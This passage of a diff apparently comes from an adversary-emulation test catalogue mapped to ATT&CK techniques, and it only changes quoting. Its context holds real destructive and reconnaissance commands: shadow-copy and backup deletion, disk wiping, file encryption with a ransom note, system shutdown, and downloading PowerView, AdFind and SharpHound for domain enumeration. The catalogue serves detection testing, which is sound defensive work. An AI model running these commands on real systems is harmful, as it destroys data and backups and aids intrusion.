Expand-Archive $env:TEMP\SDelete.zip $env:TEMP\Sdelete -Force
@@ -55171,7 +55171,7 @@ impact:
command: 'dd of=#{file_to_overwrite} if=#{overwrite_source} count=$(ls -l
#{file_to_overwrite} | awk ''{print $5}'') iflag=count_bytes
-'
+ '
name: bash
- name: Overwrite deleted data on C drive
auto_generated_guid: 321fd25e-0007-417f-adec-33232252be19
@@ -55183,7 +55183,7 @@ impact:
executor:
command: 'cipher.exe /w:C:
-'
+ '
name: command_prompt
T1486:
technique:
@@ -55263,7 +55263,7 @@ impact:
auto_generated_guid: 7b8ce084-3922-4618-8d22-95f996173765
description: 'Uses gpg to encrypt a file
-'
+ '
supported_platforms:
- linux
input_arguments:
@@ -55287,10 +55287,10 @@ impact:
dependencies:
- description: 'Finds where gpg is located
-'
+ '
prereq_command: 'which_gpg=`which gpg`
-'
+ '
get_prereq_command: "(which yum && yum -y install epel-release gpg)||(which
apt-get && DEBIAN_FRONTEND=noninteractive apt-get install -y gpg)\n"
executor:
@@ -55299,15 +55299,15 @@ impact:
command: 'echo "#{pwd_for_encrypted_file}" | $which_gpg --batch --yes --passphrase-fd
0 --cipher-algo #{encryption_alg} -o #{encrypted_file_path} -c #{input_file_path}
-'
+ '
cleanup_command: 'rm #{encrypted_file_path}
-'
+ '
- name: Encrypt files using 7z (Linux)
auto_generated_guid: 53e6735a-4727-44cc-b35b-237682a151ad
description: 'Uses 7z to encrypt a file
-'
+ '
supported_platforms:
- linux
input_arguments:
@@ -55327,10 +55327,10 @@ impact:
dependencies:
- description: 'Finds where 7z is located
-'
+ '
prereq_command: 'which_7z=`which 7z`
-'
+ '
get_prereq_command: ''
executor:
name: bash
@@ -55345,7 +55345,7 @@ impact:
an inturruption authentication to target system. If root permissions are not
available then attempts to encrypt data within user''s home directory.
-'
+ '
supported_platforms:
- linux
input_arguments:
@@ -55372,7 +55372,7 @@ impact:
- description: 'Finds where ccencrypt and ccdecrypt is located and copies input
file
-'
+ '
prereq_command: |
which_ccencrypt=`which ccencrypt`
which_ccdecrypt=`which ccdecrypt`
@@ -55387,14 +55387,14 @@ impact:
#{user_input_file_path}; file #{user_input_file_path}.cpt; #{impact_command};
fi
-'
+ '
cleanup_command: "if [[ $USER == \"root\" ]]; then mv #{cped_file_path} #{root_input_file_path};
else cp #{cped_file_path} #{user_input_file_path}; fi \n"
- name: Encrypt files using openssl (Linux)
auto_generated_guid: 142752dc-ca71-443b-9359-cf6f497315f1
description: 'Uses openssl to encrypt a file
-'
+ '
supported_platforms:
- linux
input_arguments:
@@ -55422,10 +55422,10 @@ impact:
dependencies:
- description: 'Finds where openssl is located
-'
+ '
prereq_command: 'which_openssl=`which openssl`
-'
+ '
get_prereq_command: ''
executor:
name: bash
@@ -55448,10 +55448,10 @@ impact:
elevation_required: true
command: 'echo T1486 - Purelocker Ransom Note > %USERPROFILE%\Desktop\YOUR_FILES.txt
-'
+ '
cleanup_command: 'del %USERPROFILE%\Desktop\YOUR_FILES.txt >nul 2>&1
-'
+ '
T1565:
technique:
object_marking_refs:
@@ -56102,18 +56102,18 @@ impact:
- description: 'Create volume shadow copy of C:\ . This prereq command only
works on Windows Server or Windows 8.
-'
+ '
prereq_command: 'if(!(vssadmin.exe list shadows | findstr "No items found
that satisfy the query.")) { exit 0 } else { exit 1 }
-'
+ '
get_prereq_command: 'vssadmin.exe create shadow /for=c:
-'
+ '
executor:
command: 'vssadmin.exe delete shadows /all /quiet
-'
+ '
name: command_prompt
elevation_required: true
- name: Windows - Delete Volume Shadow Copies via WMI
@@ -56126,7 +56126,7 @@ impact:
executor:
command: 'wmic.exe shadowcopy delete
-'
+ '
name: command_prompt
elevation_required: true
- name: Windows - wbadmin Delete Windows Backup Catalog
@@ -56139,7 +56139,7 @@ impact:
executor:
command: 'wbadmin delete catalog -quiet
-'
+ '
name: command_prompt
elevation_required: true
- name: Windows - Disable Windows Recovery Console Repair
@@ -56170,7 +56170,7 @@ impact:
executor:
command: 'Get-WmiObject Win32_Shadowcopy | ForEach-Object {$_.Delete();}
-'
+ '
name: powershell
elevation_required: true
- name: Windows - Delete Backup Files
@@ -56184,7 +56184,7 @@ impact:
command: 'del /s /f /q c:\*.VHD c:\*.bac c:\*.bak c:\*.wbcat c:\*.bkf c:\Backup*.*
c:\backup*.* c:\*.set c:\*.win c:\*.dsk
-'
+ '
name: command_prompt
elevation_required: true
- name: Windows - wbadmin Delete systemstatebackup
@@ -56193,13 +56193,13 @@ impact:
technique is used by numerous ransomware families. This may only be successful
on server platforms that have Windows Backup enabled.
-'
+ '
supported_platforms:
- windows
executor:
command: 'wbadmin delete systemstatebackup -keepVersions:0
-'
+ '
name: command_prompt
elevation_required: true
- name: Windows - Disable the SR scheduled task
@@ -56207,17 +56207,17 @@ impact:
description: 'Use schtasks.exe to disable the System Restore (SR) scheduled
task
-'
+ '
supported_platforms:
- windows
executor:
command: 'schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable
-'
+ '
cleanup_command: 'schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR"
/enable >nul 2>&1
-'
+ '
name: command_prompt
elevation_required: true
- name: Disable System Restore Through Registry
@@ -56299,7 +56299,7 @@ impact:
auto_generated_guid: 30558d53-9d76-41c4-9267-a7bd5184bed3
description: 'Downloads an image from a URL and sets it as the desktop wallpaper.
-'
+ '
supported_platforms:
- windows
input_arguments:
@@ -56666,7 +56666,7 @@ impact:
executor:
command: 'yes > /dev/null
-'
+ '
name: bash
T1565.003:
technique:
@@ -56884,10 +56884,10 @@ impact:
executor:
command: 'sc.exe stop #{service_name}
-'
+ '
cleanup_command: 'sc.exe start #{service_name} >nul 2>&1
-'
+ '
name: command_prompt
elevation_required: true
- name: Windows - Stop service using net.exe
@@ -56906,10 +56906,10 @@ impact:
executor:
command: 'net.exe stop #{service_name}
-'
+ '
cleanup_command: 'net.exe start #{service_name} >nul 2>&1
-'
+ '
name: command_prompt
elevation_required: true
- name: Windows - Stop service by killing process
@@ -56929,7 +56929,7 @@ impact:
executor:
command: 'taskkill.exe /f /im #{process_name}
-'
+ '
name: command_prompt
T1565.001:
technique:
@@ -57040,7 +57040,7 @@ impact:
auto_generated_guid: ad254fa8-45c0-403b-8c77-e00b3d3e7a64
description: 'This test shuts down a Windows system.
-'
+ '
supported_platforms:
- windows
input_arguments:
@@ -57051,14 +57051,14 @@ impact:
executor:
command: 'shutdown /s /t #{timeout}
-'
+ '
name: command_prompt
elevation_required: true
- name: Restart System - Windows
auto_generated_guid: f4648f0d-bf78-483c-bafc-3ec99cd1c302
description: 'This test restarts a Windows system.
-'
+ '
supported_platforms:
- windows
input_arguments:
@@ -57069,14 +57069,14 @@ impact:
executor:
command: 'shutdown /r /t #{timeout}
-'
+ '
name: command_prompt
elevation_required: true
- name: Restart System via `shutdown` - macOS/Linux
auto_generated_guid: 6326dbc4-444b-4c04-88f4-27e94d0327cb
description: 'This test restarts a macOS/Linux system.
-'
+ '
supported_platforms:
- macos
- linux
@@ -57088,14 +57088,14 @@ impact:
executor:
command: 'shutdown -r #{timeout}
-'
+ '
name: bash
elevation_required: true
- name: Shutdown System via `shutdown` - macOS/Linux
auto_generated_guid: 4963a81e-a3ad-4f02-adda-812343b351de
description: 'This test shuts down a macOS/Linux system using a halt.
-'
+ '
supported_platforms:
- macos
- linux
@@ -57107,73 +57107,73 @@ impact:
executor:
command: 'shutdown -h #{timeout}
-'
+ '
name: bash
elevation_required: true
- name: Restart System via `reboot` - macOS/Linux
auto_generated_guid: 47d0b042-a918-40ab-8cf9-150ffe919027
description: 'This test restarts a macOS/Linux system via `reboot`.
-'
+ '
supported_platforms:
- macos
- linux
executor:
command: 'reboot
-'
+ '
name: bash
elevation_required: true
- name: Shutdown System via `halt` - Linux
auto_generated_guid: 918f70ab-e1ef-49ff-bc57-b27021df84dd
description: 'This test shuts down a Linux system using `halt`.
-'
+ '
supported_platforms:
- linux
executor:
command: 'halt -p
-'
+ '
name: bash
elevation_required: true
- name: Reboot System via `halt` - Linux
auto_generated_guid: 78f92e14-f1e9-4446-b3e9-f1b921f2459e
description: 'This test restarts a Linux system using `halt`.
-'
+ '
supported_platforms:
- linux
executor:
command: 'halt --reboot
-'
+ '
name: bash
elevation_required: true
- name: Shutdown System via `poweroff` - Linux
auto_generated_guid: 73a90cd2-48a2-4ac5-8594-2af35fa909fa
description: 'This test shuts down a Linux system using `poweroff`.
-'
+ '
supported_platforms:
- linux
executor:
command: 'poweroff
-'
+ '
name: bash
elevation_required: true
- name: Reboot System via `poweroff` - Linux
auto_generated_guid: 61303105-ff60-427b-999e-efb90b314e41
description: 'This test restarts a Linux system using `poweroff`.
-'
+ '
supported_platforms:
- linux
executor:
command: 'poweroff --reboot
-'
+ '
name: bash
elevation_required: true
T1565.002:
@@ -57344,10 +57344,10 @@ discovery:
dependencies:
- description: 'T1010.cs must exist on disk at specified location (#{input_source_code})
-'
+ '
prereq_command: 'if (Test-Path #{input_source_code}) {exit 0} else {exit 1}
-'
+ '
get_prereq_command: |
New-Item -Type Directory (split-path #{input_source_code}) -ErrorAction ignore | Out-Null
Invoke-WebRequest https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1010/src/T1010.cs -OutFile "#{input_source_code}"
@@ -57357,7 +57357,7 @@ discovery:
#{output_file_name}
cleanup_command: 'del /f /q /s #{output_file_name} >nul 2>&1
-'
+ '
name: command_prompt
T1217:
technique:
@@ -57407,7 +57407,7 @@ discovery:
description: 'Searches for Mozilla Firefox''s places.sqlite file (on Linux distributions)
that contains bookmarks and lists any found instances to a text file.
-'
+ '
supported_platforms:
- linux
input_arguments:
@@ -57421,14 +57421,14 @@ discovery:
cat #{output_file} 2>/dev/null
cleanup_command: 'rm -f #{output_file} 2>/dev/null
-'
+ '
name: sh
- name: List Mozilla Firefox Bookmark Database Files on macOS
auto_generated_guid: 1ca1f9c7-44bc-46bb-8c85-c50e2e94267b
description: 'Searches for Mozilla Firefox''s places.sqlite file (on macOS)
that contains bookmarks and lists any found instances to a text file.
-'
+ '
supported_platforms:
- macos
input_arguments:
@@ -57442,14 +57442,14 @@ discovery:
cat #{output_file} 2>/dev/null
cleanup_command: 'rm -f #{output_file} 2>/dev/null
-'
+ '
name: sh
- name: List Google Chrome Bookmark JSON Files on macOS
auto_generated_guid: b789d341-154b-4a42-a071-9111588be9bc
description: 'Searches for Google Chrome''s Bookmark file (on macOS) that contains
bookmarks in JSON format and lists any found instances to a text file.
-'
+ '
supported_platforms:
- macos
input_arguments:
@@ -57463,7 +57463,7 @@ discovery:
cat #{output_file} 2>/dev/null
cleanup_command: 'rm -f #{output_file} 2>/dev/null
-'
+ '
name: sh
- name: List Google Chrome / Opera Bookmarks on Windows with powershell
auto_generated_guid: faab755e-4299-48ec-8202-fc7885eb6545
@@ -57476,7 +57476,7 @@ discovery:
command: 'Get-ChildItem -Path C:\Users\ -Filter Bookmarks -Recurse -ErrorAction
SilentlyContinue -Force
-'
+ '
name: powershell
- name: List Google Chrome / Edge Chromium Bookmarks on Windows with command prompt
auto_generated_guid: 76f71e2f-480e-4bed-b61e-398fe17499d5
@@ -57488,7 +57488,7 @@ discovery:
executor:
command: 'where /R C:\Users\ Bookmarks
-'
+ '
name: command_prompt
- name: List Mozilla Firefox bookmarks on Windows with command prompt
auto_generated_guid: 4312cdbc-79fc-4a9c-becc-53d49c734bc5
@@ -57500,7 +57500,7 @@ discovery:
executor:
command: 'where /R C:\Users\ places.sqlite
-'
+ '
name: command_prompt
- name: List Internet Explorer Bookmarks using the command prompt
auto_generated_guid: 727dbcdb-e495-4ab1-a6c4-80c7f77aef85
@@ -57511,14 +57511,14 @@ discovery:
executor:
command: 'dir /s /b %USERPROFILE%\Favorites
-'
+ '
name: command_prompt
- name: List Safari Bookmarks on MacOS
auto_generated_guid: 5fc528dd-79de-47f5-8188-25572b7fafe0
description: 'This test searches for Safari''s Bookmarks file (on macOS) and
lists any found instances to a text file.
-'
+ '
supported_platforms:
- macos
input_arguments:
@@ -57531,7 +57531,7 @@ discovery:
\ncat #{output_file} \n"
cleanup_command: 'rm -f #{output_file} 2>/dev/null
-'
+ '
name: sh
T1087.004:
technique:
@@ -58062,7 +58062,7 @@ discovery:
description: 'Enumerate all accounts via PowerShell. Upon execution, lots of
user account and group information will be displayed.
-'
+ '
supported_platforms:
- windows
executor:
@@ -58076,7 +58076,7 @@ discovery:
description: 'Enumerate logged on users. Upon exeuction, logged on users will
be displayed.
-'
+ '
supported_platforms:
- windows
input_arguments:
@@ -58087,7 +58087,7 @@ discovery:
executor:
command: 'query user /SERVER:#{computer_name}
-'
+ '
name: command_prompt
- name: Automated AD Recon (ADRecon)
auto_generated_guid: 95018438-454a-468c-a0fa-59c800149b59
@@ -58105,18 +58105,18 @@ discovery:
dependencies:
- description: 'ADRecon must exist on disk at specified location (#{adrecon_path})
-'
+ '
prereq_command: 'if (Test-Path #{adrecon_path}) {exit 0} else {exit 1}
-'
+ '
get_prereq_command: 'Invoke-WebRequest -Uri "https://raw.githubusercontent.com/sense-of-security/ADRecon/38e4abae3e26d0fa87281c1d0c65cabd4d3c6ebd/ADRecon.ps1"
-OutFile #{adrecon_path}
-'
+ '
executor:
command: 'Invoke-Expression #{adrecon_path}
-'
+ '
cleanup_command: |
Remove-Item #{adrecon_path} -Force -ErrorAction Ignore | Out-Null
Get-ChildItem $env:TEMP -Recurse -Force | Where{$_.Name -Match "^ADRecon-Report-"} | Remove-Item -Force -Recurse
@@ -58137,14 +58137,14 @@ discovery:
dependencies:
- description: 'AdFind.exe must exist on disk at specified location (#{adfind_path})
-'
+ '
prereq_command: 'if (Test-Path #{adfind_path}) {exit 0} else {exit 1}
-'
+ '
get_prereq_command: 'Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe"
-OutFile #{adfind_path}
-'
+ '
executor:
command: "#{adfind_path} -default -s base lockoutduration lockoutthreshold
lockoutobservationwindow maxpwdage minpwdage minpwdlength pwdhistorylength
@@ -58166,14 +58166,14 @@ discovery:
dependencies:
- description: 'AdFind.exe must exist on disk at specified location (#{adfind_path})
-'
+ '
prereq_command: 'if (Test-Path #{adfind_path}) {exit 0} else {exit 1}
-'
+ '
get_prereq_command: 'Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe"
-OutFile #{adfind_path}
-'
+ '
executor:
command: "#{adfind_path} -sc admincountdmp\n"
name: command_prompt
@@ -58193,14 +58193,14 @@ discovery:
dependencies:
- description: 'AdFind.exe must exist on disk at specified location (#{adfind_path})
-'
+ '
prereq_command: 'if (Test-Path #{adfind_path}) {exit 0} else {exit 1}
-'
+ '
get_prereq_command: 'Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe"
-OutFile #{adfind_path}
-'
+ '
executor:
command: "#{adfind_path} -f (objectcategory=person)\n"
name: command_prompt
@@ -58220,14 +58220,14 @@ discovery:
dependencies:
- description: 'AdFind.exe must exist on disk at specified location (#{adfind_path})
-'
+ '
prereq_command: 'if (Test-Path #{adfind_path}) {exit 0} else {exit 1}
-'
+ '
get_prereq_command: 'Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe"
-OutFile #{adfind_path}
-'
+ '
executor:
command: "#{adfind_path} -sc exchaddresses\n"
name: command_prompt
@@ -58236,13 +58236,13 @@ discovery:
description: 'This test will enumerate the details of the built-in domain admin
account
-'
+ '
supported_platforms:
- windows
executor:
command: 'net user administrator /domain
-'
+ '
name: command_prompt
- name: Enumerate Active Directory for Unconstrained Delegation
auto_generated_guid: 46f8dbe9-22a5-4770-8513-66119c5be63b
@@ -58265,7 +58265,7 @@ discovery:
dependencies:
- description: 'PowerShell ActiveDirectory Module must be installed
-'
+ '
prereq_command: |
Try {
Import-Module ActiveDirectory -ErrorAction Stop | Out-Null
@@ -58286,13 +58286,13 @@ discovery:
command: 'Get-ADObject -LDAPFilter ''(UserAccountControl:1.2.840.113556.1.4.803:=#{uac_prop})''
-Server #{domain}
-'
+ '
- name: Get-DomainUser with PowerView
auto_generated_guid: 93662494-5ed7-4454-a04c-8c8372808ac2
description: 'Utilizing PowerView, run Get-DomainUser to identify the domain
users. Upon execution, Users within the domain will be listed.
-'
+ '
supported_platforms:
- windows
executor:
@@ -58379,7 +58379,7 @@ discovery:
executor:
command: 'get-ADPrincipalGroupMembership #{user} | select name
-'
+ '
name: powershell
- name: Elevated group enumeration using net group (Domain)
auto_generated_guid: 0afb5163-8181-432e-9405-4322710c0c37
@@ -58401,7 +58401,7 @@ discovery:
execution, progress and info about each host in the domain being scanned will
be displayed.
-'
+ '
supported_platforms:
- windows
executor:
@@ -58415,7 +58415,7 @@ discovery:
machines in the domain. Upon execution, information about each machine will
be displayed.
-'
+ '
supported_platforms:
- windows
executor:
@@ -58428,7 +58428,7 @@ discovery:
description: 'takes a computer and determines who has admin rights over it through
GPO enumeration. Upon execution, information about the machine will be displayed.
-'
+ '
supported_platforms:
- windows
input_arguments:
@@ -58446,39 +58446,39 @@ discovery:
description: 'When successful, accounts that do not require kerberos pre-auth
will be returned
-'
+ '
supported_platforms:
- windows
dependency_executor_name: powershell
dependencies:
- description: 'Computer must be domain joined.
-'
+ '
prereq_command: 'if((Get-CIMInstance -Class Win32_ComputerSystem).PartOfDomain)
{exit 0} else {exit 1}
-'
+ '
get_prereq_command: 'Write-Host Joining this computer to a domain must be
done manually.
-'
+ '
- description: 'Requires the Active Directory module for powershell to be installed.
-'
+ '
prereq_command: 'if(Get-Module -ListAvailable -Name ActiveDirectory) {exit
0} else {exit 1}
-'
+ '
get_prereq_command: 'Add-WindowsCapability -Online -Name "Rsat.ActiveDirectory.DS-LDS.Tools~~~~0.0.1.0"
-'
+ '
executor:
name: powershell
elevation_required: false
command: 'get-aduser -f * -pr DoesNotRequirePreAuth | where {$_.DoesNotRequirePreAuth
-eq $TRUE}
-'
+ '
- name: Adfind - Query Active Directory Groups
auto_generated_guid: 48ddc687-82af-40b7-8472-ff1e742e8274
description: |
@@ -58495,10 +58495,10 @@ discovery:
dependencies:
- description: 'AdFind.exe must exist on disk at specified location (#{adfind_path})
-'
+ '
prereq_command: 'if (Test-Path #{adfind_path}) {exit 0} else {exit 1}
-'
+ '
get_prereq_command: |
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe" -OutFile #{adfind_path}
@@ -58517,7 +58517,7 @@ discovery:
name: powershell
command: 'Get-AdGroup -Filter *
-'
+ '
- name: Enumerate Active Directory Groups with ADSISearcher
auto_generated_guid: 9f4e344b-8434-41b3-85b1-d38f29d148d0
description: |
@@ -58531,7 +58531,7 @@ discovery:
elevation_required: false
command: '([adsisearcher]"objectcategory=group").FindAll(); ([adsisearcher]"objectcategory=group").FindOne()
-'
+ '
- name: Get-ADUser Enumeration using UserAccountControl flags (AS-REP Roasting)
auto_generated_guid: 43fa81fb-34bb-4b5f-867b-03c7dbe0e3d8
description: |
@@ -58543,39 +58543,39 @@ discovery:
dependencies:
- description: 'Computer must be domain joined.
-'
+ '
prereq_command: 'if((Get-CIMInstance -Class Win32_ComputerSystem).PartOfDomain)
{exit 0} else {exit 1}
-'
+ '
get_prereq_command: 'Write-Host Joining this computer to a domain must be
done manually.
-'
+ '
- description: 'Requires the Active Directory module for powershell to be installed.
-'
+ '
prereq_command: 'if(Get-Module -ListAvailable -Name ActiveDirectory) {exit
0} else {exit 1}
-'
+ '
get_prereq_command: 'Add-WindowsCapability -Online -Name "Rsat.ActiveDirectory.DS-LDS.Tools~~~~0.0.1.0"
-'
+ '
executor:
name: powershell
elevation_required: false
command: 'Get-ADUser -Filter ''useraccountcontrol -band 4194304'' -Properties
useraccountcontrol | Format-Table name
-'
+ '
- name: Get-DomainGroupMember with PowerView
auto_generated_guid: 46352f40-f283-4fe5-b56d-d9a71750e145
description: 'Utilizing PowerView, run Get-DomainGroupMember to identify domain
users. Upon execution, progress and info about groups within the domain being
scanned will be displayed.
-'
+ '
supported_platforms:
- windows
executor:
@@ -58588,7 +58588,7 @@ discovery:
description: 'Utilizing PowerView, run Get-DomainGroup to identify the domain
groups. Upon execution, Groups within the domain will be listed.
-'
+ '
supported_platforms:
- windows
executor:
@@ -58679,7 +58679,7 @@ discovery:
executor:
command: 'dsquery * -filter "(objectClass=trustedDomain)" -attr *
-'
+ '
name: command_prompt
- name: Windows - Discover domain trusts with nltest
auto_generated_guid: 2e22641d-0498-48d2-b9ff-c71e496ccdbe
@@ -58692,17 +58692,17 @@ discovery:
dependencies:
- description: 'nltest.exe from RSAT must be present on disk
-'
+ '
prereq_command: 'WHERE nltest.exe >NUL 2>&1
-'
+ '
get_prereq_command: 'echo Sorry RSAT must be installed manually
-'
+ '
executor:
command: 'nltest /domain_trusts
-'
+ '
name: command_prompt
- name: Powershell enumerate domains and forests
auto_generated_guid: c58fbc62-8a62-489e-8f2d-3565d7d96f30
@@ -58715,26 +58715,26 @@ discovery:
dependencies:
- description: 'PowerView PowerShell script must exist on disk
-'
+ '
prereq_command: 'if (Test-Path $env:TEMP\PowerView.ps1) {exit 0} else {exit
1}
-'
+ '
get_prereq_command: 'Invoke-WebRequest "https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f94a5d298a1b4c5dfb1f30a246d9c73d13b22888/Recon/PowerView.ps1"
-OutFile "$env:TEMP\PowerView.ps1"
-'
+ '
- description: 'RSAT PowerShell AD admin cmdlets must be installed
-'
+ '
prereq_command: 'if ((Get-Command "Get-ADDomain" -ErrorAction Ignore) -And
(Get-Command "Get-ADGroupMember" -ErrorAction Ignore)) { exit 0 } else {
exit 1 }
-'
+ '
get_prereq_command: 'Write-Host "Sorry RSAT must be installed manually"
-'
+ '
executor:
command: |
Import-Module "$env:TEMP\PowerView.ps1"
@@ -58759,14 +58759,14 @@ discovery:
dependencies:
- description: 'AdFind.exe must exist on disk at specified location (#{adfind_path})
-'
+ '
prereq_command: 'if (Test-Path #{adfind_path}) {exit 0} else {exit 1}
-'
+ '
get_prereq_command: 'Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe"
-OutFile #{adfind_path}
-'
+ '
executor:
command: "#{adfind_path} -f (objectcategory=organizationalUnit)\n"
name: command_prompt
@@ -58786,14 +58786,14 @@ discovery:
dependencies:
- description: 'AdFind.exe must exist on disk at specified location (#{adfind_path})
-'
+ '
prereq_command: 'if (Test-Path #{adfind_path}) {exit 0} else {exit 1}
-'
+ '
get_prereq_command: 'Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe"
-OutFile #{adfind_path}
-'
+ '
executor:
command: "#{adfind_path} -gcb -sc trustdmp\n"
name: command_prompt
@@ -58803,7 +58803,7 @@ discovery:
Upon execution, progress and info about trusts within the domain being scanned
will be displayed.
-'
+ '
supported_platforms:
- windows
executor:
@@ -58817,7 +58817,7 @@ discovery:
Upon execution, progress and info about forest trusts within the domain being
scanned will be displayed.
-'
+ '
supported_platforms:
- windows
executor:
@@ -58955,7 +58955,7 @@ discovery:
description: 'Find or discover files on the file system. Upon execution, file
and folder information will be displayed.
-'
+ '
supported_platforms:
- windows
executor:
@@ -58994,13 +58994,13 @@ discovery:
which sh
cleanup_command: 'rm #{output_file}
-'
+ '
name: sh
- name: Nix File and Directory Discovery 2
auto_generated_guid: 13c5e1ae-605b-46c4-a79f-db28c77ff24e
description: 'Find or discover files on the file system
-'
+ '
supported_platforms:
- macos
- linux
@@ -59044,7 +59044,7 @@ discovery:
| Out-File -append #{File_to_output}}\n}\ncat #{File_to_output}\n"
cleanup_command: 'remove-item #{File_to_output} -ErrorAction SilentlyContinue
-'
+ '
name: powershell
T1615:
technique:
@@ -59122,7 +59122,7 @@ discovery:
elevation_required: false
command: 'gpresult /z
-'
+ '
T1016.001:
technique:
object_marking_refs:
@@ -59211,7 +59211,7 @@ discovery:
auto_generated_guid: f8aab3dd-5990-4bf8-b8ab-2226c951696f
description: 'Enumerate all accounts by copying /etc/passwd to another file
-'
+ '
supported_platforms:
- linux
input_arguments:
@@ -59225,7 +59225,7 @@ discovery:
cat #{output_file}
cleanup_command: 'rm -f #{output_file}
-'
+ '
name: sh
- name: View sudoers access
auto_generated_guid: fed9be70-0186-4bde-9f8a-20945f9370c2
@@ -59244,14 +59244,14 @@ discovery:
cat #{output_file}
cleanup_command: 'rm -f #{output_file}
-'
+ '
name: sh
elevation_required: true
- name: View accounts with UID 0
auto_generated_guid: c955a599-3653-4fe5-b631-f11c00eb0397
description: 'View accounts with UID 0
-'
+ '
supported_platforms:
- linux
- macos
@@ -59266,36 +59266,36 @@ discovery:
cat #{output_file} 2>/dev/null
cleanup_command: 'rm -f #{output_file} 2>/dev/null
-'
+ '
name: sh
- name: List opened files by user
auto_generated_guid: 7e46c7a5-0142-45be-a858-1a3ecb4fd3cb
description: 'List opened files by user
-'
+ '
supported_platforms:
- linux
- macos
executor:
command: 'username=$(id -u -n) && lsof -u $username
-'
+ '
name: sh
dependency_executor_name: sh
dependencies:
- description: 'check if lsof exists
-'
+ '
prereq_command: 'which lsof
-'
+ '
get_prereq_command: "(which yum && yum -y install lsof)||(which apt-get &&
DEBIAN_FRONTEND=noninteractive apt-get install -y lsof)\n"
- name: Show if a user account has ever logged in remotely
auto_generated_guid: 0f0b6a29-08c3-44ad-a30b-47fd996b2110
description: 'Show if a user account has ever logged in remotely
-'
+ '
supported_platforms:
- linux
input_arguments:
@@ -59307,27 +59307,27 @@ discovery:
dependencies:
- description: 'Check if lastlog command exists on the machine
-'
+ '
prereq_command: 'if [ -x "$(command -v lastlog)" ]; then exit 0; else exit
1; fi
-'
+ '
get_prereq_command: 'sudo apt-get install login; exit 1;
-'
+ '
executor:
command: |
lastlog > #{output_file}
cat #{output_file}
cleanup_command: 'rm -f #{output_file}
-'
+ '
name: sh
- name: Enumerate users and groups
auto_generated_guid: e6f36545-dc1e-47f0-9f48-7f730f54a02e
description: 'Utilize groups and id to enumerate users and groups
-'
+ '
supported_platforms:
- linux
- macos
@@ -59340,7 +59340,7 @@ discovery:
auto_generated_guid: 319e9f6c-7a9e-432e-8c62-9385c803b6f2
description: 'Utilize local utilities to enumerate users and groups
-'
+ '
supported_platforms:
- macos
executor:
@@ -59371,7 +59371,7 @@ discovery:
description: 'Enumerate all accounts via PowerShell. Upon execution, lots of
user account and group information will be displayed.
-'
+ '
supported_platforms:
- windows
executor:
@@ -59391,13 +59391,13 @@ discovery:
description: 'Enumerate logged on users. Upon execution, logged on users will
be displayed.
-'
+ '
supported_platforms:
- windows
executor:
command: 'query user
-'
+ '
name: command_prompt
T1069.001:
technique:
@@ -59441,7 +59441,7 @@ discovery:
auto_generated_guid: 952931a4-af0b-4335-bbbe-73c8c5b327ae
description: 'Permission Groups Discovery
-'
+ '
supported_platforms:
- macos
- linux
@@ -59483,7 +59483,7 @@ discovery:
description: 'This module runs the Windows executable of SharpHound in order
to remotely list members of the local Administrators group (SAMR)
-'
+ '
supported_platforms:
- windows
input_arguments:
@@ -59507,11 +59507,11 @@ discovery:
prereq_command: 'if (Test-Path "#{sharphound_path}") { exit 0 } else { exit
1 }
-'
+ '
get_prereq_command: 'Invoke-WebRequest "https://github.com/BloodHoundAD/BloodHound/blob/e062fe73d73c015dccb37fae5089342d009b84b8/Collectors/SharpHound.exe?raw=true"
-OutFile "#{sharphound_path}"
-'
+ '
executor:
name: powershell
elevation_required: false
@@ -59520,19 +59520,19 @@ discovery:
& "#{sharphound_path}" -d "#{domain}" --CollectionMethod LocalAdmin --NoSaveCache --OutputDirectory "#{output_path}"
cleanup_command: 'Remove-Item -Recurse #{output_path} -ErrorAction Ignore
-'
+ '
- name: Wmic Group Discovery
auto_generated_guid: 7413be50-be8e-430f-ad4d-07bf197884b2
description: 'Utilizing wmic.exe to enumerate groups on the local system. Upon
execution, information will be displayed of local groups on system.
-'
+ '
supported_platforms:
- windows
executor:
command: 'wmic.exe group get name
-'
+ '
name: powershell
- name: WMIObject Group Discovery
auto_generated_guid: 69119e58-96db-4110-ad27-954e48f3bb13
@@ -59540,13 +59540,13 @@ discovery:
groups on the endpoint. Upon execution, Upon execution, information will be
displayed of local groups on system.
-'
+ '
supported_platforms:
- windows
executor:
command: 'Get-WMIObject Win32_Group
-'
+ '
name: powershell
T1046:
technique:
@@ -59642,28 +59642,28 @@ discovery:
dependencies:
- description: 'Check if nmap command exists on the machine
-'
+ '
prereq_command: 'if [ -x "$(command -v nmap)" ]; then exit 0; else exit 1;
fi;
-'
+ '
get_prereq_command: "(which yum && yum -y install epel-release nmap)||(which
apt-get && DEBIAN_FRONTEND=noninteractive apt-get install -y nmap)\n"
- description: 'Check if nc command exists on the machine
-'
+ '
prereq_command: 'if [ -x "$(command -v nc)" ]; then exit 0; else exit 1; fi;
-'
+ '
get_prereq_command: "(which yum && yum -y install epel-release nc)||(which
apt-get && DEBIAN_FRONTEND=noninteractive apt-get install -y netcat)\n"
- description: 'Check if telnet command exists on the machine
-'
+ '
prereq_command: 'if [ -x "$(command -v telnet)" ]; then exit 0; else exit
1; fi;
-'
+ '
get_prereq_command: "(which yum && yum -y install epel-release telnet)||(which
apt-get && DEBIAN_FRONTEND=noninteractive apt-get install -y telnet)\n"
executor:
@@ -59691,7 +59691,7 @@ discovery:
dependencies:
- description: 'NMap must be installed
-'
+ '
prereq_command: if (cmd /c "nmap 2>nul") {exit 0} else {exit 1}
